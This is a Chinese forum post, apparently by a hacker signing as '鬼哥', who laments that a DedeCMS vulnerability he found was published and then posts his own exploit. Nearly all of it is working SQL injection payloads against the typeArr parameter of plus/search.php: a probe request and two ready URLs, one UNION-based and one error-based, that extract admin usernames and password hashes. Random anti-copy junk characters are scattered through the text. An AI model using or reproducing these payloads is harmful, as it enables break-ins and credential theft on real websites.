转载不加作者名的没JJ
G! H& c9 j9 G0 e! X3 H' T& R2 c9 ?# b# g2 y- G7 ~2 T
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
y4 d S' L* g% \8 c! ~9 V
: O( V- F+ r( y既然已经发出来了,我就把我自己搞的exp发下吧。。唉。& d7 Z+ C: x3 W) _* R
3 |' I$ L- N6 L我一般是这样测试的:
# j0 {. _0 _- q# S3 q, `0 c9 C/ m# A
I J3 e1 W# H0 _提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a7 E6 ~( ] P) C! g3 e
1 [) G4 R" O8 N转载不加作者名的没JJ, j; J( A, F- V/ H4 q
9 ?: B7 m: E9 u/ c, x) _作者:鬼哥
( y# A0 T! F' Q* D, ^0 E
9 U: z) K. m8 l. j$ H3 m, b5 ~! L
9 h, P9 m0 ^+ y( y8 a7 `2 L1 z
# P* @4 ?$ h- l+ U2 F8 A看结果如果提示2 |) W* g; z1 i. S1 ?. y5 i: P
9 ]; w5 D7 A3 D* |7 H! u. I H y
Safe Alert: Request Error step 2 !2 l F. v- z: ?7 Y+ Q5 e* C
" [; {/ ^; Q' D" y2 a那么直接用下面的exp
7 S H$ f8 p u
- ~6 V2 U' ^* |2 _5 M0 y' y. cxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a9 B# `7 {. b' p# X; P+ N
' R- Y8 p; d3 N% H- e- M6 a9 z, J; h: L8 K( Y
看结果如果提示; e# W' }8 E z! ^1 X
3 e' Z5 w6 ^: u; h: LSafe Alert: Request Error step 1 !
2 {# f* w1 @- j. c- B d, Q$ r1 C' [& j3 v4 y
那么直接用下面的exp
7 G; k1 {/ u2 Q& |- v( J, x% Y0 E; Q6 N( B
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
$ }: O' _1 J8 Y& ^5 |( A
O/ r" D8 s7 i; I. ^+ j' n d- a# ]* x7 @9 F
如果正常显示证明漏洞不存在了。
6 A2 y' N1 M2 z9 T) b+ N- M! y; f3 B( {; w- j, I) @" p! ^
转载不加作者名的没JJ |